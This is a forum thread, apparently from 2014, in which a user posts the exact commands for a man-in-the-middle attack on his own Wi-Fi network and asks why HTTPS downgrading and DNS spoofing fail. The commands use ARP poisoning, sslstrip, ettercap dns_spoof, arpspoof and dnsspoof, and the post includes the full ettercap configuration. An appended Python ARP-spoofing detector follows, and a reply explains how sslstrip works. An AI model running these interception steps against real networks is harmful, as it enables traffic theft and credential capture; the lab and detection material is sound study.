GarrettVD Posted September 4, 2014 (edited)

I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targeted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof. I am using a combination of the following:

- SSLStrip
- Ettercap (with the dns_spoof plugin enabled).
- urlsnarf
- Wireshark (for examining post-test PCAP results)

The commands I perform are as follows:

```bash
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/sslstrip.log
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i wlan0 | grep http > /root/session.txt

# 192.168.2.1 = router, 192.168.2.130 = Macbook Air
echo 1 > /proc/sys/net/ipv4/ip_forward;
ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/
ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/

# This runs for a while, I then stop manually... and then clean up and examine results in Wireshark
wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/session.eci
```

I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing or redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/.

Instead, what happens is I will receive either an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari) or a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; it just resolves the domain as it should (see my /etc/ettercap/etter.dns configuration below). I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534):

```ini
. . .
[privs]
ec_uid = 0   # nobody is the default
ec_gid = 0   # nobody is the default
. . .
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
. . .
```

Alternatively, for a simple dnsspoof, I've tried a simple combination of arpspoof + dnsspoof. Doesn't work either. :(

```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1
dnsspoof -i wlan0 -f /root/hosts.txt
```

I've Googled for a few days now, but after reading post upon post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below... Any help would be greatly appreciated.

Thanks,

/etc/ettercap/etter.dns:

```
#############################################################################
#                                                                           #
#  ettercap -- etter.dns -- host file for dns_spoof plugin                  #
#                                                                           #
#  Copyright © ALoR & NaGA                                                  #
#                                                                           #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                           #
#############################################################################
#
# Sample hosts file for dns_spoof plugin
#
# the format is (for A query):
#   www.myhostname.com A 168.11.22.33
#   *.foo.com A 168.44.55.66
#
# ... for a AAAA query (same hostname allowed):
#   www.myhostname.com AAAA 2001:db8::1
#   *.foo.com AAAA 2001:db8::2
#
# or to skip a protocol family (useful with dual-stack):
#   www.hotmail.com AAAA ::
#   www.yahoo.com A 0.0.0.0
#
# or for PTR query:
#   www.bar.com PTR 10.0.0.10
#   www.google.com PTR ::1
#
# or for MX query (either IPv4 or IPv6):
#   domain.com MX xxx.xxx.xxx.xxx
#   domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
#   domain3.com MX xxxx:xxxx::y
#
# or for WINS query:
#   workgroup WINS 127.0.0.1
#   PC* WINS 127.0.0.1
#
# or for SRV query (either IPv4 or IPv6):
#   service._tcp|_udp.domain SRV 192.168.1.10:port
#   service._tcp|_udp.domain SRV [2001:db8::3]:port
#
# NOTE: the wildcarded hosts can't be used to poison the PTR requests
#       so if you want to reverse poison you have to specify a plain
#       host. (look at the www.microsoft.com example)
#
#############################################################################

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com       A    198.182.2.23
*.microsoft.com     A    198.182.2.23
www.microsoft.com   PTR  198.182.2.23

foo.com             A    198.168.2.23
*.foo.com           A    198.168.2.23
www.foo.com         PTR  198.168.2.23   # Wildcards in PTR are not allowed

##########################################
# no one out there can have our domains...
#
www.alor.org        A    127.0.0.1
www.naga.org        A    127.0.0.1
www.naga.org        AAAA 2001:db8::2

##########################################
# dual stack enabled hosts does not make life easy
# force them back to single stack
www.ietf.org        A    127.0.0.1
www.ietf.org        AAAA ::
www.example.org     A    0.0.0.0
www.example.org     AAAA ::1

###############################################
# one day we will have our ettercap.org domain
#
www.ettercap.org           A    127.0.0.1
www.ettercap-project.org   A    127.0.0.1
ettercap.sourceforge.net   A    216.136.171.201
www.ettercap.org           PTR  ::1

###############################################
# some MX examples
#
alor.org        MX 127.0.0.1
naga.org        MX 127.0.0.1
example.org     MX 127.0.0.2
microsoft.com   MX 2001:db8::1ce:c01d:bee3

###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
#
LAB-PC*   WINS 127.0.0.1

###############################################
# some service discovery examples
xmpp-server._tcp.jabber.org   SRV 192.168.1.10:5269
ldap._udp.mynet.com           SRV [2001:db8:c001:beef::1]:389

# vim:ts=8:noexpandtab
```

etter.conf:

```ini
#############################################################################
#                                                                           #
#  ettercap -- etter.conf -- configuration file                             #
#                                                                           #
#  Copyright © ALoR & NaGA                                                  #
#                                                                           #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                           #
#############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

[mitm]
arp_storm_delay = 10      # seconds
arp_poison_warm_up = 1    # seconds
arp_poison_delay = 10     # seconds
arp_poison_icmp = 1       # boolean
arp_poison_reply = 1      # boolean
arp_poison_request = 0    # boolean
arp_poison_equal_mac = 1  # boolean
dhcp_lease_time = 1800    # seconds
port_steal_delay = 10     # seconds
port_steal_send_delay = 2000  # microseconds

[connections]
connection_timeout = 300  # seconds
connection_idle = 5       # seconds
connection_buffer = 10000 # bytes
connect_timeout = 5       # seconds

[stats]
sampling_rate = 50        # number of packets

[misc]
close_on_eof = 1          # boolean value
store_profiles = 1        # 0 = disabled; 1 = all; 2 = local; 3 = remote
aggressive_dissectors = 1 # boolean value
skip_forwarded_pcks = 1   # boolean value
checksum_check = 0        # boolean value
submit_fingerprint = 0    # boolean valid (set if you want ettercap to submit unknown finger prints)
checksum_warning = 0      # boolean value (valid only if checksum_check is 1)

#############################################################################
# You can specify what DISSECTORS are to be enabled or not...
#
# e.g.:  ftp = 21        enabled on port 21 (tcp is implicit)
#        ftp = 2345      enabled on non standard port
#        ftp = 21,453    enabled on port 21 and 453
#        ftp = 0         disabled
#
# NOTE: some dissectors have multiple default ports, if you specify a new
#       one, all the default ports will be overwritten
#
##dissector      default port
[dissectors]
ftp = 21                  # tcp 21
ssh = 22                  # tcp 22
telnet = 23               # tcp 23
smtp = 25                 # tcp 25
dns = 53                  # udp 53
dhcp = 67                 # udp 68
http = 80                 # tcp 80
ospf = 89                 # ip 89 (IPPROTO 0x59)
pop3 = 110                # tcp 110
#portmap = 111            # tcp / udp
vrrp = 112                # ip 112 (IPPROTO 0x70)
nntp = 119                # tcp 119
smb = 139,445             # tcp 139 445
imap = 143,220            # tcp 143 220
snmp = 161                # udp 161
bgp = 179                 # tcp 179
ldap = 389                # tcp 389
https = 443               # tcp 443
ssmtp = 465               # tcp 465
rlogin = 512,513          # tcp 512 513
rip = 520                 # udp 520
nntps = 563               # tcp 563
ldaps = 636               # tcp 636
telnets = 992             # tcp 992
imaps = 993               # tcp 993
ircs = 994                # tcp 993
pop3s = 995               # tcp 995
socks = 1080              # tcp 1080
radius = 1645,1646        # udp 1645 1646
msn = 1863                # tcp 1863
cvs = 2401                # tcp 2401
mysql = 3306              # tcp 3306
icq = 5190                # tcp 5190
ymsg = 5050               # tcp 5050
mdns = 5353               # udp 5353
vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
gg = 8074                 # tcp 8074
proxy = 8080              # tcp 8080
rcon = 27015,27960        # udp 27015 27960
ppp = 34827               # special case ;) this is the Net Layer code
TN3270 = 23,992           # tcp 23 992

#
# you can change the colors of the curses GUI.
# here is a list of values:
#     0 Black     4 Blue
#     1 Red       5 Magenta
#     2 Green     6 Cyan
#     3 Yellow    7 White
#
[curses]
color_bg = 0
color_fg = 7
color_join1 = 2
color_join2 = 4
color_border = 7
color_title = 3
color_focus = 6
color_menu_bg = 4
color_menu_fg = 6
color_window_bg = 4
color_window_fg = 7
color_selection_bg = 6
color_selection_fg = 6
color_error_bg = 1
color_error_fg = 3
color_error_border = 3

#
# This section includes all the configurations that needs a string as a
# parmeter such as the redirect command for SSL mitm attack.
#
[strings]
# the default encoding to be used for the UTF-8 visualization
utf8_encoding = "ISO-8859-1"

# the command used by the remote_browser plugin
remote_browser = "xdg-open http://%host%url"

#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.

#---------------
#  Linux
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------
#  Mac Os X
#---------------
# quick and dirty way:
   #redir_command_on = "ipfw add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
   #redir_command_off = "ipfw -q delete set %set"

# a better solution is to use a script that keeps track of the rules interted
# and then deletes them on exit:
# redir_command_on:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
#     ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
# else
#     ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
# redir_command_off:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
#     ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
#     rm -f /tmp/osx_ipfw_rules
# fi
# ----- cut here -------

#---------------
#  Open BSD
#---------------
# unfortunately the pfctl command does not accepts direct rules adding
# you have to use a script wich executed the following command:
# ----- cut here -------
# #!/bin/sh
# rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -
# ----- cut here -------
# it's important to remember that you need "rdr-anchor sslsniff" in your
# pf.conf in the TRANSLATION section.
   #redir_command_on = "the_script_described_above %iface %port %rport"
   #redir_command_off = "pfctl -a sslsniff -Fn"
# also, if you create a group called "pfusers" and have EC_GID be that group,
# you can do something like:
# chgrp pfusers /dev/pf
# chmod g+rw /dev/pf
# such that all users in "pfusers" can run pfctl commands; thus allowing non-root
# execution of redir commands.

#######
# EOF #
#######
```

Edited September 4, 2014 by GarrettVD
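The run described above puts a recognisable signature on the wire: ARP replies that rebind the router's IP to a new MAC, and (with ettercap's `arp:remote`) one MAC answering for both the router and the target. The following detector is an added example, not code from the poster or from ettercap; it parses raw Ethernet+ARP frames and raises those two alerts over a constructed three-frame exchange (the MAC addresses, `ArpMonitor` class and `demo()` are all assumptions made for the example).

```python
import struct
from collections import defaultdict
ETH_P_ARP = 0x0806
_mac = lambda s: bytes.fromhex(s.replace(":", ""))
_ip = lambda s: bytes(int(o) for o in s.split("."))

def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    # Raw Ethernet II + ARP frame; used here only to construct sample traffic (never sent).
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)  # htype, ptype, hlen, plen, oper
    return eth + arp + _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
def parse_arp(frame):
    # Return (opcode, sender_mac, sender_ip) for an ARP frame, else None.
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    return opcode, sender_mac, ".".join(str(b) for b in frame[28:32])

class ArpMonitor:
    def __init__(self, gateway_ip, pinned=None):
        self.gateway_ip = gateway_ip
        self.table = dict(pinned or {})   # ip -> first MAC seen (or operator-pinned)
        self.claims = defaultdict(set)    # mac -> IPs it has answered for
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:  # only ARP replies carry the poison
            return
        _, mac, ip = parsed
        first = self.table.setdefault(ip, mac)
        if first != mac:                      # binding changed: classic poisoning symptom
            kind = "gateway-impersonation" if ip == self.gateway_ip else "binding-change"
            self.alerts.append((kind, ip, first, mac))
        if ip not in self.claims[mac]:
            self.claims[mac].add(ip)
            if len(self.claims[mac]) > 1:     # arp:remote pattern: one host posing as both ends
                self.alerts.append(("multi-ip-claim", mac, tuple(sorted(self.claims[mac]))))

def demo():
    # Constructed three-reply exchange mirroring the router/Air pairing from the thread.
    gw, air, atk = "00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:99"
    mon = ArpMonitor("192.168.2.1", pinned={"192.168.2.1": gw})
    for f in (build_arp(2, gw, "192.168.2.1", air, "192.168.2.130"),   # legitimate router reply
              build_arp(2, atk, "192.168.2.1", air, "192.168.2.130"),  # third host claims the router IP
              build_arp(2, atk, "192.168.2.130", gw, "192.168.2.1")):  # same host claims the Air's IP
        mon.feed(f)
    return mon.alerts
```

On a live host the frames would come from a raw socket on the LAN interface; pinning the gateway's real MAC in `pinned` is what turns the second frame into a gateway-impersonation alert rather than a silent first sighting.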
digininja Posted September 5, 2014

sslstrip doesn't downgrade direct requests for HTTPS; it swaps any references to HTTPS for HTTP in any HTTP traffic it sees. The reason it can't downgrade is because the browser is expecting HTTPS traffic so won't settle for anything else.